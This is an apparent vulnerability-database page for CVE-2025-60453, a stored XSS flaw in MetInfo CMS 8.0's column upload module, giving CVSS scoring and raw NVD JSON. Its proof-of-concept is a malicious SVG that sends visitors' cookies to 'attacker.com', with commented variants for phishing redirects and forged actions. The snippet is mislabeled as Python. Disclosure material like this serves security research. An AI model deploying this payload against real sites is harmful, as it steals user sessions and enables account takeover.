Security Vulnerability Report
中文
CVE-2025-60453 CVSS 6.1 MEDIUM

CVE-2025-60453

Published: 2025-10-03 14:15:47
Last Modified: 2025-10-07 15:21:35
Source: [email protected]

Description

A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists in the column management module, specifically in the app\system\column\admin\index.class.php component. The vulnerability allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed by users.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:* - VULNERABLE
MetInfo CMS 8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Malicious SVG file for Stored XSS in MetInfo CMS 8.0 Column Module --> <!-- CVE-2025-60453 --> <!-- Upload this file via the column management module's file upload functionality --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="200" height="200"> <script type="text/javascript"> // Malicious JavaScript payload - executed when SVG is rendered in browser // Example: Steal cookies and send to attacker's server var cookie = document.cookie; var img = new Image(); img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(cookie); // Alternative: Redirect to phishing page // window.location.href = "https://attacker.com/phishing"; // Alternative: Perform actions on behalf of the user // fetch('/api/sensitive-action', {method: 'POST', credentials: 'include'}); </script> <rect x="0" y="0" width="200" height="200" fill="blue"/> <text x="50" y="100" fill="white">Icon</text> </svg>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60453", "sourceIdentifier": "[email protected]", "published": "2025-10-03T14:15:46.927", "lastModified": "2025-10-07T15:21:35.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists in the column management module, specifically in the app\\system\\column\\admin\\index.class.php component. The vulnerability allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed by users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"}]}]}], "references": [{"url": "https://snowhy77.github.io/2025/08/22/Stored-XSS-in-MetInfo-Column-Module/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.